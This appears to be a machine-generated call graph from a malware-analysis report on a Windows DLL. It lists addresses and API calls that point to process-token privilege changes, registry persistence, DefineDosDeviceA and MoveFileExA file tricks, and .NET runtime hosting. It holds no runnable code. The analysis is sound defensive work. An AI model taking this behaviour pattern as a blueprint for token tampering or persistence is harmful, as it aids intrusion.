API calls 19512->19515 19516 1000518c 44 API calls 19512->19516 19914 1000afa4 19512->19914 19931 1000976d 19512->19931 19936 10009d5b 19512->19936 19945 10008ec1 19512->19945 19513->18842 19514->19501 19515->19512 19516->19512 19520 1000a25f 44 API calls 19519->19520 19521 10002da0 ReadFile 19520->19521 19522 10002dc9 CloseHandle 19521->19522 19524 10002dbd 19521->19524 19523 1000a25f 44 API calls 19522->19523 19525 10002dda 19523->19525 19524->19522 20727 10002c08 CreateFileA 19525->20727 19527 10002dfe 19527->18844 19529 1000a78b 19528->19529 20743 1000a61b 19529->20743 19531 1000a7a2 19531->18847 19533 1000b0f2 19532->19533 19535 1000b0eb 19532->19535 19534 1000d5b3 __lseeki64_nolock 37 API calls 19533->19534 19540 1000b0f7 19534->19540 19535->19533 19538 1000b120 19535->19538 19536 1000d561 __output_l 11 API calls 19537 10003c58 FindWindowExA 19536->19537 19537->18850 19537->18881 19538->19537 19539 1000d5b3 __lseeki64_nolock 37 API calls 19538->19539 19539->19540 19540->19536 20763 10001772 GetCurrentProcess OpenProcessToken 19541->20763 19546 10001926 OpenProcess 19547 1000191e 19546->19547 19548 1000193b OpenProcessToken 19546->19548 19549 100017fe 10 API calls 19547->19549 19550 10001951 CloseHandle 19548->19550 19551 1000195c AdjustTokenPrivileges 19548->19551 19552 10001bbd 19549->19552 19550->19547 19558 100019a0 19551->19558 19682 10001994 19551->19682 19553 10001bc6 OpenProcess 19552->19553 19554 10001e4b 19552->19554 19553->19554 19557 10001bdf OpenProcessToken 19553->19557 19556 100017fe 10 API calls 19554->19556 19559 10001e55 19556->19559 19560 10001c03 AdjustTokenPrivileges 19557->19560 19561 10001bf5 CloseHandle 19557->19561 19567 100019be 19558->19567 20781 100018a0 AdjustTokenPrivileges 19558->20781 19562 100020e3 19559->19562 19563 10001e5e OpenProcess 19559->19563 19560->19554 19571 10001c3f 19560->19571 19561->19554 19564 100017fe 10 API calls 19562->19564 19563->19562 19565 10001e77 OpenProcessToken 19563->19565 19568 100020ed 19564->19568 19569 10001e9b AdjustTokenPrivileges 19565->19569 19570 10001e8d CloseHandle 19565->19570 19575 100019dd 19567->19575 19579 100018a0 6 API calls 19567->19579 19573 10002376 19568->19573 19574 100020f6 OpenProcess 19568->19574 19569->19562 19583 10001ed7 19569->19583 19570->19562 19584 10001c5d 19571->19584 19585 100018a0 6 API calls 19571->19585 19576 1000a501 __call_reportfault 5 API calls 19573->19576 19574->19573 19577 1000210f OpenProcessToken 19574->19577 19586 100019fc 19575->19586 19590 100018a0 6 API calls 19575->19590 19580 10002386 19576->19580 19581 10002133 AdjustTokenPrivileges 19577->19581 19582 10002125 CloseHandle 19577->19582 19579->19575 19580->18853 19580->18854 19581->19573 19591 1000216f 19581->19591 19582->19573 19588 10001ef5 19583->19588 19592 100018a0 6 API calls 19583->19592 19589 10001c7c 19584->19589 19593 100018a0 6 API calls 19584->19593 19585->19584 19594 10001a1b 19586->19594 19598 100018a0 6 API calls 19586->19598 19596 10001f14 19588->19596 19600 100018a0 6 API calls 19588->19600 19597 10001c9b 19589->19597 19601 100018a0 6 API calls 19589->19601 19590->19586 19595 1000218d 19591->19595 19599 100018a0 6 API calls 19591->19599 19592->19588 19593->19589 19602 10001a3a 19594->19602 19604 100018a0 6 API calls 19594->19604 19605 100021ac 19595->19605 19608 100018a0 6 API calls 19595->19608 19606 10001f33 19596->19606 19609 100018a0 6 API calls 19596->19609 19603 10001cba 19597->19603 19607 100018a0 6 API calls 19597->19607 19598->19594 19599->19595 19600->19596 19601->19597 19610 10001a59 19602->19610 19613 100018a0 6 API calls 19602->19613 19612 10001cd9 19603->19612 19616 100018a0 6 API calls 19603->19616 19604->19602 19614 100021cb 19605->19614 19617 100018a0 6 API calls 19605->19617 19611 10001f52 19606->19611 19615 100018a0 6 API calls 19606->19615 19607->19603 19608->19605 19609->19606 19618 10001a78 19610->19618 19619 100018a0 6 API calls 19610->19619 19621 10001f71 19611->19621 19624 100018a0 6 API calls 19611->19624 19622 10001cf8 19612->19622 19625 100018a0 6 API calls 19612->19625 19613->19610 19620 100021ea 19614->19620 19623 100018a0 6 API calls 19614->19623 19615->19611 19616->19612 19617->19614 19626 10001a97 19618->19626 19628 100018a0 6 API calls 19618->19628 19619->19618 19629 10002209 19620->19629 19632 100018a0 6 API calls 19620->19632 19630 10001f90 19621->19630 19633 100018a0 6 API calls 19621->19633 19627 10001d17 19622->19627 19631 100018a0 6 API calls 19622->19631 19623->19620 19624->19621 19625->19622 19634 10001ab6 19626->19634 19638 100018a0 6 API calls 19626->19638 19637 10001d36 19627->19637 19641 100018a0 6 API calls 19627->19641 19628->19626 19635 10002228 19629->19635 19639 100018a0 6 API calls 19629->19639 19636 10001faf 19630->19636 19640 100018a0 6 API calls 19630->19640 19631->19627 19632->19629 19633->19630 19642 10001ad5 19634->19642 19643 100018a0 6 API calls 19634->19643 19644 10002247 19635->19644 19647 100018a0 6 API calls 19635->19647 19645 10001fce 19636->19645 19648 100018a0 6 API calls 19636->19648 19646 10001d55 19637->19646 19649 100018a0 6 API calls 19637->19649 19638->19634 19639->19635 19640->19636 19641->19637 19650 10001af4 19642->19650 19653 100018a0 6 API calls 19642->19653 19643->19642 19654 10002266 19644->19654 19657 100018a0 6 API calls 19644->19657 19651 10001fed 19645->19651 19655 100018a0 6 API calls 19645->19655 19652 10001d74 19646->19652 19656 100018a0 6 API calls 19646->19656 19647->19644 19648->19645 19649->19646 19658 10001b13 19650->19658 19662 100018a0 6 API calls 19650->19662 19660 1000200c 19651->19660 19664 100018a0 6 API calls 19651->19664 19661 10001d93 19652->19661 19665 100018a0 6 API calls 19652->19665 19653->19650 19659 10002285 19654->19659 19663 100018a0 6 API calls 19654->19663 19655->19651 19656->19652 19657->19654 19666 10001b32 19658->19666 19668 100018a0 6 API calls 19658->19668 19669 100022a4 19659->19669 19672 100018a0 6 API calls 19659->19672 19670 1000202b 19660->19670 19673 100018a0 6 API calls 19660->19673 19667 10001db2 19661->19667 19671 100018a0 6 API calls 19661->19671 19662->19658 19663->19659 19664->19660 19665->19661 19674 10001b52 GetLengthSid SetTokenInformation 19666->19674 19677 100018a0 6 API calls 19666->19677 19676 10001dd1 19667->19676 19680 100018a0 6 API calls 19667->19680 19668->19666 19678 100022c3 19669->19678 19683 100018a0 6 API calls 19669->19683 19675 1000204a 19670->19675 19679 100018a0 6 API calls 19670->19679 19671->19667 19672->19669 19673->19670 19674->19682 19685 10002069 19675->19685 19688 100018a0 6 API calls 19675->19688 19686 10001df1 GetLengthSid SetTokenInformation 19676->19686 19689 100018a0 6 API calls 19676->19689 19681 10001b51 19677->19681 19684 100022e2 19678->19684 19687 100018a0 6 API calls 19678->19687 19679->19675 19680->19676 19681->19674 19682->19547 19683->19678 19692 10002301 19684->19692 19694 100018a0 6 API calls 19684->19694 19693 10002089 GetLengthSid SetTokenInformation 19685->19693 19695 100018a0 6 API calls 19685->19695 19690 10001e41 19686->19690 19687->19684 19688->19685 19691 10001df0 19689->19691 19690->19554 19691->19686 19698 10002321 GetLengthSid SetTokenInformation 19692->19698 19699 100018a0 6 API calls 19692->19699 19697 100020d9 19693->19697 19694->19692 19696 10002088 19695->19696 19696->19693 19697->19562 19701 10002371 19698->19701 19700 10002320 19699->19700 19700->19698 19701->19573 19703 1000b32f _doexit 37 API calls 19702->19703 19704 1000b480 19703->19704 19704->18873 20784 10013a60 19705->20784 19707 10002397 7 API calls 19708 10002480 19707->19708 20785 100016ca 19708->20785 19710 100024c0 20791 1000172a 19710->20791 19712 100024f5 20796 10001672 19712->20796 19714 10002554 19715 1000172a 2 API calls 19714->19715 19716 10002582 19715->19716 19717 100016ca 45 API calls 19716->19717 19718 100025f7 19717->19718 19719 1000172a 2 API calls 19718->19719 19720 10002625 _memset 19719->19720 19721 1000a77d _mbstowcs 41 API calls 19720->19721 19722 100026ee 19721->19722 19723 100016ca 45 API calls 19722->19723 19724 10002712 19723->19724 19725 1000172a 2 API calls 19724->19725 19727 10002741 19725->19727 19726 10002794 VariantInit VariantInit 19728 10001672 50 API calls 19726->19728 19727->19726 19729 100027f4 19728->19729 19730 1000172a 2 API calls 19729->19730 19731 1000285a CoUninitialize 19730->19731 19733 10002886 19731->19733 19733->18858 19735 10002e35 19734->19735 19736 10002e3c CoCreateInstance 19734->19736 19735->18864 19735->18865 19737 10002f71 VariantClear 19736->19737 19740 10002e5b 19736->19740 19738 10002f82 19737->19738 19739 10002f88 CoUninitialize 19737->19739 19738->19739 19739->19735 19740->19737 19741 10002f01 SafeArrayAccessData 19740->19741 19741->19737 19742 10002f15 SafeArrayGetLBound SafeArrayGetUBound 19741->19742 19743 10002f42 CoTaskMemAlloc 19742->19743 19744 10002f68 SafeArrayUnaccessData 19742->19744 19743->19744 19745 10002f4f 19743->19745 19744->19737 19745->19744 20820 100139f7 19746->20820 19748 10002fa1 CLRCreateInstance 19751 10002fc4 19748->19751 19753 1000303a 19748->19753 19749 100030af SafeArrayAccessData 19749->19751 19749->19753 19750 100030e3 SafeArrayUnaccessData 19750->19751 19750->19753 19751->19749 19751->19750 19752 10003192 SysAllocString 19751->19752 19751->19753 19752->19751 19753->18869 19755 10001189 19754->19755 19756 1000119f RegSetValueExA 19755->19756 19758 1000118d 19755->19758 19757 100011ba RegCloseKey 19756->19757 19762 100011cd _memset 19756->19762 19757->19758 19759 1000afa4 _wprintf 64 API calls 19758->19759 19760 10001197 19759->19760 19761 1000a501 __call_reportfault 5 API calls 19760->19761 19763 10001670 19761->19763 19762->19758 19764 100012e8 RegCloseKey SHGetSpecialFolderPathA 19762->19764 19765 100012de 19762->19765 19763->18861 19766 1000131d _memset 19764->19766 19765->18861 19766->19766 19767 1000a510 _sprintf 62 API calls 19766->19767 19768 100013c8 _memset 19767->19768 19769 10001476 RegCreateKeyExA 19768->19769 19769->19765 19770 100014a4 19769->19770 19771 1000a510 _sprintf 62 API calls 19770->19771 19772 100014bc RegSetValueExA 19771->19772 19772->19757 19774 100014f6 19772->19774 19775 1000a510 _sprintf 62 API calls 19774->19775 19776 1000150e DefineDosDeviceA 19775->19776 19777 10001551 _memset 19776->19777 19778 1000a510 _sprintf 62 API calls 19777->19778 19779 1000156b 19778->19779 19780 10001030 10 API calls 19779->19780 19781 1000157f _memset 19780->19781 19782 1000164a MoveFileExA 19781->19782 19782->19760 19784 10001137 19783->19784 19785 1000105e CoCreateInstance 19783->19785 19788 1000a501 __call_reportfault 5 API calls 19784->19788 19786 10001080 lstrlen 19785->19786 19787 10001131 CoUninitialize 19785->19787 19791 100010b5 _memset 19786->19791 19787->19784 19789 10001142 Sleep CoInitializeEx 19788->19789 19789->18889 19789->18890 19792 10001119 19791->19792 19793 100010e5 MultiByteToWideChar 19791->19793 19792->19787 19793->19792 19796 1000b4c8 19794->19796 19795 1000ac8b _malloc 37 API calls 19795->19796 19796->19795 19797 1000b4ec 19796->19797 19798 1000e997 _malloc RtlDecodePointer 19796->19798 19802 1000b4ee std::exception::exception 19796->19802 19797->19474 19798->19796 19799 1000b52c 19806 1000a8bd 19799->19806 19802->19799 19804 1000c403 __cinit 43 API calls 19802->19804 19804->19799 19805 1000b547 19812 1000a856 19806->19812 19809 1000bce7 19810 1000bd10 19809->19810 19811 1000bd1c RaiseException 19809->19811 19810->19811 19811->19805 19813 1000a866 19812->19813 19817 1000a87b 19812->19817 19818 1000a811 19813->19818 19817->19809 19819 1000a824 19818->19819 19820 1000a81c 19818->19820 19819->19817 19822 1000a7d1 19819->19822 19821 1000ac51 _free 37 API calls 19820->19821 19821->19819 19823 1000a7df _strlen 19822->19823 19826 1000a804 19822->19826 19824 1000ac8b _malloc 37 API calls 19823->19824 19825 1000a7f1 19824->19825 19825->19826 19827 1000e5d6 _strcpy_s 37 API calls 19825->19827 19826->19817 19827->19826 19829 10005248 19828->19829 19830 1000523e 19828->19830 19832 10005270 19829->19832 19833 10005258 19829->19833 19845 1000a1f1 19830->19845 19834 1000539c 44 API calls 19832->19834 19852 10005332 19833->19852 19838 1000526e 19834->19838 19836 10005264 19837 10005332 38 API calls 19836->19837 19837->19838 19838->19483 19840 100053a1 19839->19840 19841 100053ab 19839->19841 19859 1000a1a4 19840->19859 19844 100053bc 19841->19844 19866 100053d8 19841->19866 19844->19483 19856 1000a82f 19845->19856 19848 1000bce7 __CxxThrowException@8 RaiseException 19849 1000a220 19848->19849 19850 1000a8bd std::exception::exception 37 API calls 19849->19850 19851 1000a231 19850->19851 19851->19829 19853 1000533c 19852->19853 19855 10005346 _memmove 19852->19855 19854 1000a1f1 std::_Xinvalid_argument 38 API calls 19853->19854 19854->19855 19855->19836 19857 1000a7d1 std::exception::_Copy_str 37 API calls 19856->19857 19858 1000a20b 19857->19858 19858->19848 19860 1000a82f std::exception::exception 37 API calls 19859->19860 19861 1000a1be 19860->19861 19862 1000bce7 __CxxThrowException@8 RaiseException 19861->19862 19863 1000a1d3 19862->19863 19864 1000a8bd std::exception::exception 37 API calls 19863->19864 19865 1000a1e4 19864->19865 19865->19841 19867 100053e4 __EH_prolog3_catch 19866->19867 19870 100054ed 19867->19870 19869 1000542b 19869->19844 19871 10005532 19870->19871 19872 100054fa 19870->19872 19871->19869 19876 10005508 19872->19876 19878 1000b4c8 19872->19878 19873 1000a82f std::exception::exception 37 API calls 19875 1000551d 19873->19875 19877 1000bce7 __CxxThrowException@8 RaiseException 19875->19877 19876->19871 19876->19873 19877->19871 19880 1000b4d2 19878->19880 19879 1000ac8b _malloc 37 API calls 19879->19880 19880->19879 19881 1000b4ec 19880->19881 19882 1000e997 _malloc RtlDecodePointer 19880->19882 19884 1000b4ee std::exception::exception 19880->19884 19881->19876 19882->19880 19883 1000a8bd std::exception::exception 37 API calls 19885 1000b536 19883->19885 19887 1000c403 __cinit 43 API calls 19884->19887 19889 1000b52c 19884->19889 19886 1000bce7 __CxxThrowException@8 RaiseException 19885->19886 19888 1000b547 19886->19888 19887->19889 19889->19883 19891 10009c79 19890->19891 19892 10009c6f 19890->19892 19964 10009eb3 19891->19964 19893 10005332 38 API calls 19892->19893 19895 10009c77 19893->19895 19895->19490 19896 10009c86 19896->19490 19898 10008de9 __EH_prolog3 19897->19898 19899 1000b4c8 44 API calls 19898->19899 19900 10008df3 19899->19900 19901 10008e09 19900->19901 19978 1000827b 19900->19978 19970 100082d0 19901->19970 19905 1000b4c8 44 API calls 19906 10008e24 19905->19906 19906->19492 20103 1000b61b 19907->20103 19910 10008e86 19911 10008ea2 19910->19911 19912 10008e9b 19910->19912 19911->19912 20113 1000839b 19911->20113 19912->19512 19915 1000afb0 ___BuildCatchObjectHelper 19914->19915 19916 1000afd3 __flsbuf 19915->19916 19917 1000afbe 19915->19917 20173 1000ead7 19916->20173 19918 1000d5b3 __lseeki64_nolock 37 API calls 19917->19918 19919 1000afc3 19918->19919 19921 1000d561 __output_l 11 API calls 19919->19921 19923 1000afce ___BuildCatchObjectHelper 19921->19923 19922 1000afe5 __flsbuf 20178 1000eb74 19922->20178 19923->19512 19925 1000aff7 __flsbuf 20185 1000c82b 19925->20185 19927 1000b00f __flsbuf 20203 1000ec10 19927->20203 19932 10009779 __EH_prolog3_GS 19931->19932 19934 1000981c 19932->19934 19935 10009e0b 44 API calls 19932->19935 20364 1000b9ad 19932->20364 19934->19512 19935->19932 19937 10009d67 __EH_prolog3 19936->19937 19938 10009d9c 19937->19938 19939 10009d76 19937->19939 19940 10009e5c 44 API calls 19938->19940 19941 10009d8e 19938->19941 19939->19941 20369 10009e5c 19939->20369 19940->19941 19943 10009dbc 19941->19943 19944 10005166 44 API calls 19941->19944 19943->19512 19944->19943 19946 10008ec8 19945->19946 19947 10008ecf 19945->19947 19946->19512 19947->19946 20389 10008a7e 19947->20389 19951 10008f07 19949->19951 19957 10008efb ctype 19949->19957 19950 10008f25 19953 10008f3a 19950->19953 19954 10008215 37 API calls 19950->19954 19950->19957 19951->19950 19952 10008215 37 API calls 19951->19952 19951->19957 19952->19950 19955 100075b7 CloseHandle 19953->19955 19954->19953 19956 10008f41 19955->19956 19958 1000ac51 _free 37 API calls 19956->19958 19957->19506 19958->19957 19960 1000973b 19959->19960 19961 10009730 19959->19961 19960->19961 20565 100095e2 19960->20565 19961->19506 19963 10009750 ctype 19963->19506 19965 10009ec9 19964->19965 19966 10009ebf 19964->19966 19968 1000539c 44 API calls 19965->19968 19969 10009ed8 _memset 19965->19969 19967 1000a1a4 std::_Xinvalid_argument 38 API calls 19966->19967 19967->19965 19968->19969 19969->19896 19971 100082d9 19970->19971 19976 1000832a 19970->19976 19972 100082df GetCurrentDirectoryA 19971->19972 19971->19976 19973 100082f6 19972->19973 19982 1000752c CreateFileA 19973->19982 19976->19905 19976->19906 19979 100082a0 19978->19979 19980 100082b6 19978->19980 19981 1000b4c8 44 API calls 19979->19981 19980->19901 19981->19980 19983 10007565 SetFilePointer 19982->19983 19984 1000755b 19982->19984 19985 1000b4c8 44 API calls 19983->19985 19984->19976 19988 100078a8 19984->19988 19986 10007581 19985->19986 19986->19984 19987 100075a1 SetFilePointer 19986->19987 19987->19984 19989 100078c4 _memset 19988->19989 19990 100078bd 19988->19990 20018 10007777 19989->20018 19990->19976 19994 100078f9 20002 100078fd 19994->20002 20035 1000770d 19994->20035 19995 10007926 19997 10007955 19995->19997 20000 100076d1 ReadFile 19995->20000 19999 100079d0 19997->19999 20004 100076d1 ReadFile 19997->20004 20049 100075b7 19999->20049 20001 10007942 20000->20001 20001->19997 20006 100076d1 ReadFile 20001->20006 20002->19995 20044 100076d1 20002->20044 20010 10007971 20004->20010 20005 100079d8 20007 100079dd 20005->20007 20006->19997 20008 1000ac8b _malloc 37 API calls 20007->20008 20009 10007a07 20008->20009 20054 10007c48 20009->20054 20010->19999 20012 1000770d ReadFile 20010->20012 20013 10007996 20012->20013 20013->19999 20014 1000770d ReadFile 20013->20014 20015 100079a2 20014->20015 20015->19999 20016 100076d1 ReadFile 20015->20016 20017 100079b2 20016->20017 20017->19999 20017->20007 20019 100075d8 SetFilePointer 20018->20019 20020 1000778e 20019->20020 20021 100077a5 SetFilePointer 20020->20021 20022 100077ba 20020->20022 20024 10007792 20020->20024 20021->20022 20023 1000ac8b _malloc 37 API calls 20022->20023 20029 100077e4 20023->20029 20024->20002 20030 100075d8 20024->20030 20025 10007897 20026 1000ac51 _free 37 API calls 20025->20026 20026->20024 20027 100075d8 SetFilePointer 20027->20029 20029->20024 20029->20025 20029->20027 20059 10007637 20029->20059 20031 10007614 20030->20031 20033 100075de 20030->20033 20031->19994 20032 10007601 SetFilePointer 20032->20031 20033->20032 20034 1000760c 20033->20034 20034->19994 20062 10007697 20035->20062 20038 10007730 20040 10007697 ReadFile 20038->20040 20043 10007748 20038->20043 20039 10007697 ReadFile 20039->20038 20040->20043 20041 10007697 ReadFile 20042 10007760 20041->20042 20042->20002 20043->20041 20043->20042 20045 10007697 ReadFile 20044->20045 20046 100076e2 20045->20046 20047 10007697 ReadFile 20046->20047 20048 100076f6 20046->20048 20047->20048 20048->19995 20050 100075bb 20049->20050 20051 100075bf 20049->20051 20050->20005 20052 100075c5 CloseHandle 20051->20052 20053 100075ce ctype 20051->20053 20052->20053 20053->20005 20055 10007c52 20054->20055 20056 10007c4d 20054->20056 20065 10007a25 20055->20065 20056->19990 20060 1000765e 20059->20060 20061 10007647 ReadFile 20059->20061 20060->20029 20061->20060 20063 10007637 ReadFile 20062->20063 20064 100076ab 20063->20064 20064->20038 20064->20039 20066 10007a41 20065->20066 20100 10007a39 20065->20100 20067 100075d8 SetFilePointer 20066->20067 20068 10007a50 20067->20068 20069 1000770d ReadFile 20068->20069 20070 10007a54 20068->20070 20069->20070 20071 100076d1 ReadFile 20070->20071 20072 10007a8b 20071->20072 20073 100076d1 ReadFile 20072->20073 20074 10007aa1 20073->20074 20075 100076d1 ReadFile 20074->20075 20076 10007ab4 20075->20076 20077 100076d1 ReadFile 20076->20077 20078 10007ac7 20077->20078 20079 1000770d ReadFile 20078->20079 20080 10007ada 20079->20080 20081 1000770d ReadFile 20080->20081 20082 10007b34 20081->20082 20083 1000770d ReadFile 20082->20083 20084 10007b46 20083->20084 20085 1000770d ReadFile 20084->20085 20086 10007b58 20085->20086 20087 100076d1 ReadFile 20086->20087 20088 10007b6a 20087->20088 20089 100076d1 ReadFile 20088->20089 20090 10007b7d 20089->20090 20091 100076d1 ReadFile 20090->20091 20092 10007b90 20091->20092 20093 100076d1 ReadFile 20092->20093 20094 10007ba3 20093->20094 20095 100076d1 ReadFile 20094->20095 20096 10007bb6 20095->20096 20097 1000770d ReadFile 20096->20097 20098 10007bc9 20097->20098 20099 1000770d ReadFile 20098->20099 20101 10007bdb 20099->20101 20100->19990 20101->20100 20102 10007637 ReadFile 20101->20102 20102->20100 20106 1000b548 20103->20106 20105 1000836a 20105->19495 20105->19910 20107 1000a594 _LocaleUpdate::_LocaleUpdate 39 API calls 20106->20107 20108 1000b563 20107->20108 20109 1000d5b3 __lseeki64_nolock 37 API calls 20108->20109 20110 1000b580 _memset _strncpy 20108->20110 20111 1000b575 20109->20111 20110->20105 20112 1000d561 __output_l 11 API calls 20111->20112 20112->20110 20114 100083cd 20113->20114 20127 100083f2 ctype 20113->20127 20119 100083e3 20114->20119 20114->20127 20162 10008215 20114->20162 20115 1000a501 __call_reportfault 5 API calls 20117 1000892c 20115->20117 20117->19912 20118 1000845e 20121 1000848b 20118->20121 20168 10007c7d 20118->20168 20119->20118 20120 10007c48 2 API calls 20119->20120 20119->20127 20120->20118 20123 10007a25 2 API calls 20121->20123 20124 100084a7 20123->20124 20139 10007cce 20124->20139 20127->20115 20128 100075d8 SetFilePointer 20129 100084e8 20128->20129 20129->20127 20130 1000b4c8 44 API calls 20129->20130 20131 10008501 20130->20131 20132 10007637 ReadFile 20131->20132 20134 10008520 20132->20134 20133 1000b79f 39 API calls 20133->20134 20134->20127 20134->20133 20135 100085c0 20134->20135 20136 1000b61b __fassign 39 API calls 20135->20136 20137 100085cf SystemTimeToFileTime LocalFileTimeToFileTime 20136->20137 20137->20127 20140 100075d8 SetFilePointer 20139->20140 20141 10007cfc 20140->20141 20142 1000770d ReadFile 20141->20142 20161 10007d00 20141->20161 20143 10007d13 20142->20143 20144 100076d1 ReadFile 20143->20144 20145 10007d3a 20144->20145 20146 100076d1 ReadFile 20145->20146 20147 10007d4d 20146->20147 20148 100076d1 ReadFile 20147->20148 20150 10007d60 20148->20150 20149 1000770d ReadFile 20151 10007d93 20149->20151 20150->20149 20152 1000770d ReadFile 20151->20152 20153 10007da5 20152->20153 20154 1000770d ReadFile 20153->20154 20155 10007dd4 20154->20155 20156 1000770d ReadFile 20155->20156 20157 10007e03 20156->20157 20158 100076d1 ReadFile 20157->20158 20159 10007e32 20158->20159 20160 100076d1 ReadFile 20159->20160 20160->20161 20161->20127 20161->20128 20163 10008223 20162->20163 20164 10008228 20162->20164 20163->20119 20164->20163 20165 10008255 20164->20165 20166 1000ac51 _free 37 API calls 20164->20166 20167 1000ac51 _free 37 API calls 20165->20167 20166->20165 20167->20163 20169 10007c82 20168->20169 20170 10007c87 20168->20170 20169->20118 20170->20169 20171 10007a25 2 API calls 20170->20171 20172 10007cbf 20171->20172 20172->20118 20174 1000eae4 20173->20174 20175 1000eafa RtlEnterCriticalSection 20173->20175 20176 1000ef92 __lock 37 API calls 20174->20176 20175->19922 20177 1000eaed 20176->20177 20177->19922 20211 10012595 20178->20211 20180 1000eb83 20218 1001253f 20180->20218 20182 1000ebd6 20182->19925 20183 1000eb89 __flsbuf 20183->20182 20184 1000f7c3 __malloc_crt 37 API calls 20183->20184 20184->20182 20186 1000a594 _LocaleUpdate::_LocaleUpdate 39 API calls 20185->20186 20187 1000c892 20186->20187 20188 1000c896 20187->20188 20191 10012595 __output_l 37 API calls 20187->20191 20197 1000c8cd __output_l __aulldvrm _strlen 20187->20197 20189 1000d5b3 __lseeki64_nolock 37 API calls 20188->20189 20190 1000c89b 20189->20190 20192 1000d561 __output_l 11 API calls 20190->20192 20191->20197 20193 1000c8a6 20192->20193 20194 1000a501 __call_reportfault 5 API calls 20193->20194 20195 1000d3b2 20194->20195 20195->19927 20197->20188 20197->20193 20198 1000ac51 _free 37 API calls 20197->20198 20199 1000c7b7 60 API calls _write_string 20197->20199 20200 1000c784 60 API calls __output_l 20197->20200 20201 1000f7c3 __malloc_crt 37 API calls 20197->20201 20202 10012710 41 API calls __cftof 20197->20202 20227 1000e58b 20197->20227 20198->20197 20199->20197 20200->20197 20201->20197 20202->20197 20204 1000b020 20203->20204 20205 1000ec1b 20203->20205 20207 1000b038 20204->20207 20205->20204 20230 100135d7 20205->20230 20208 1000b03d __flsbuf 20207->20208 20358 1000eb45 20208->20358 20210 1000b048 20210->19923 20212 100125a1 20211->20212 20213 100125b6 20211->20213 20214 1000d5b3 __lseeki64_nolock 37 API calls 20212->20214 20213->20180 20215 100125a6 20214->20215 20216 1000d561 __output_l 11 API calls 20215->20216 20217 100125b1 20216->20217 20217->20180 20219 1001255b 20218->20219 20220 1001254c 20218->20220 20222 10012579 20219->20222 20223 1000d5b3 __lseeki64_nolock 37 API calls 20219->20223 20221 1000d5b3 __lseeki64_nolock 37 API calls 20220->20221 20226 10012551 20221->20226 20222->20183 20224 1001256c 20223->20224 20225 1000d561 __output_l 11 API calls 20224->20225 20225->20226 20226->20183 20228 1000a594 _LocaleUpdate::_LocaleUpdate 39 API calls 20227->20228 20229 1000e59e 20228->20229 20229->20197 20231 100135f0 20230->20231 20235 10013612 20230->20235 20232 10012595 __output_l 37 API calls 20231->20232 20231->20235 20233 1001360b 20232->20233 20236 10012422 20233->20236 20235->20204 20237 1001242e ___BuildCatchObjectHelper 20236->20237 20238 10012451 20237->20238 20239 10012436 20237->20239 20241 1001245d 20238->20241 20244 10012497 20238->20244 20261 1000d5c6 20239->20261 20243 1000d5c6 __close 37 API calls 20241->20243 20246 10012462 20243->20246 20264 100140dd 20244->20264 20245 1000d5b3 __lseeki64_nolock 37 API calls 20254 10012443 ___BuildCatchObjectHelper 20245->20254 20248 1000d5b3 __lseeki64_nolock 37 API calls 20246->20248 20250 1001246a 20248->20250 20249 1001249d 20252 100124ab 20249->20252 20253 100124bf 20249->20253 20251 1000d561 __output_l 11 API calls 20250->20251 20251->20254 20274 10011d25 20252->20274 20256 1000d5b3 __lseeki64_nolock 37 API calls 20253->20256 20254->20235 20258 100124c4 20256->20258 20257 100124b7 20333 100124ee 20257->20333 20259 1000d5c6 __close 37 API calls 20258->20259 20259->20257 20262 1000e150 __getptd_noexit 37 API calls 20261->20262 20263 1000d5cb 20262->20263 20263->20245 20266 100140e9 ___BuildCatchObjectHelper 20264->20266 20265 10014143 20268 10014165 ___BuildCatchObjectHelper 20265->20268 20269 10014148 RtlEnterCriticalSection 20265->20269 20266->20265 20267 1000ef92 __lock 37 API calls 20266->20267 20270 10014115 20267->20270 20268->20249 20269->20268 20271 10014131 20270->20271 20272 1001411e InitializeCriticalSectionAndSpinCount 20270->20272 20336 10014173 20271->20336 20272->20271 20275 10011d34 __write_nolock 20274->20275 20276 10011d89 20275->20276 20277 10011d6a 20275->20277 20306 10011d5f 20275->20306 20282 10011de5 20276->20282 20283 10011dc8 20276->20283 20278 1000d5c6 __close 37 API calls 20277->20278 20280 10011d6f 20278->20280 20279 1000a501 __call_reportfault 5 API calls 20281 10012420 20279->20281 20285 1000d5b3 __lseeki64_nolock 37 API calls 20280->20285 20281->20257 20284 10011df8 20282->20284 20339 10011bb6 20282->20339 20286 1000d5c6 __close 37 API calls 20283->20286 20289 1001253f __flsbuf 37 API calls 20284->20289 20288 10011d76 20285->20288 20290 10011dcd 20286->20290 20291 1000d561 __output_l 11 API calls 20288->20291 20292 10011e01 20289->20292 20293 1000d5b3 __lseeki64_nolock 37 API calls 20290->20293 20291->20306 20294 100120a3 20292->20294 20299 1000e1c9 __getptd 37 API calls 20292->20299 20295 10011dd5 20293->20295 20297 10012353 WriteFile 20294->20297 20298 100120b2 20294->20298 20296 1000d561 __output_l 11 API calls 20295->20296 20296->20306 20302 10012386 GetLastError 20297->20302 20322 10012085 20297->20322 20300 1001216d 20298->20300 20308 100120c5 20298->20308 20301 10011e1c GetConsoleMode 20299->20301 20312 10012247 20300->20312 20315 1001217a 20300->20315 20301->20294 20304 10011e45 20301->20304 20302->20322 20303 100123d1 20303->20306 20310 1000d5b3 __lseeki64_nolock 37 API calls 20303->20310 20304->20294 20305 10011e55 GetConsoleCP 20304->20305 20305->20322 20327 10011e78 20305->20327 20306->20279 20307 100123a4 20313 100123c3 20307->20313 20314 100123af 20307->20314 20308->20303 20309 1001210f WriteFile 20308->20309 20308->20322 20309->20302 20309->20308 20317 100123f4 20310->20317 20311 100122b8 WideCharToMultiByte 20311->20302 20319 100122ef WriteFile 20311->20319 20312->20303 20312->20311 20312->20319 20312->20322 20352 1000d5d9 20313->20352 20318 1000d5b3 __lseeki64_nolock 37 API calls 20314->20318 20315->20303 20316 100121e9 WriteFile 20315->20316 20315->20322 20316->20302 20316->20315 20321 1000d5c6 __close 37 API calls 20317->20321 20323 100123b4 20318->20323 20319->20312 20324 10012326 GetLastError 20319->20324 20321->20306 20322->20303 20322->20306 20322->20307 20326 1000d5c6 __close 37 API calls 20323->20326 20324->20312 20326->20306 20327->20302 20327->20322 20328 10011f24 WideCharToMultiByte 20327->20328 20329 100142fb 41 API calls __fassign 20327->20329 20331 100141a3 WriteConsoleW CreateFileW __write_nolock 20327->20331 20332 10011fa9 WriteFile 20327->20332 20349 1000e5c3 20327->20349 20328->20322 20330 10011f55 WriteFile 20328->20330 20329->20327 20330->20302 20330->20327 20331->20327 20332->20302 20332->20327 20357 1001417c RtlLeaveCriticalSection 20333->20357 20335 100124f4 20335->20254 20337 1000eeb9 _doexit 